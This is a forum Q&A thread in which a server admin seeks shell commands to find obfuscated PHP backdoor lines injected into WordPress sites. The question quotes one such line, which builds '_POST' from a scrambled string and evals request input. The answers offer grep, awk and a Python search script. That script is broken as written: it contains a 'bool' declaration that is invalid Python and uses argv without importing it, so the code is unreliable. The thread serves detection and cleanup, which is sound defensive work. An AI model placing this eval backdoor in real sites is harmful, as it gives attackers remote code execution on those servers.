Need help on Linux Shell Script to find a pattern of strings

Question

grep is an excellent utility, But when it comes to this particular task, I dont find any Linux command comes handy.

In my server, lots of hacked files are injected mainly on all the wordpress websites. The pattern is typically like this.

$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}'q5dfb07'])) { eval(${$s20}['q5dfb07']); }

Now, I am looking for linux command which can find the following strings in a single line. isset, eval, [0], [1], [2], [3], These strings can come in any order.

I think, using we can do it like, grep eval $name | grep strto | grep isset

Answer 1

Based on the information given here: http://www.thegeekstuff.com/2011/10/grep-or-and-not-operators/

If the order is important, use this command:

grep -E 'pattern1.*pattern2' filename

If order doesn't matter, you'll need to format it like this:

grep -E 'pattern1.*pattern2|pattern2.*pattern1' filename

As you could imagine, this could get pretty ugly. I think the most easily readable one is what you suggest:

grep -E 'pattern1' filename | grep -E 'pattern2'

However, a simple python program could help you:

#!/usr/bin/env python
keys = argv[1:-1]
with open(argv[-1], 'r') as fd:
  for line in fd:
    bool matched = True
    for key in keys:
      if key not in line:
        matched = False
        break
    if matched:
      print(line)

You can run this like:

python search.py pattern1 pattern2 pattern3 filename

Answer 2

You can try this grep -P:

grep -P '(?=.*?isset)(?=.*?eval)(?=.*?\[\d+\])' file.php

Or if you don't have grep then you can use awk:

awk '/isset/ && /eval/ && /\[[0-9]+\]/' file.php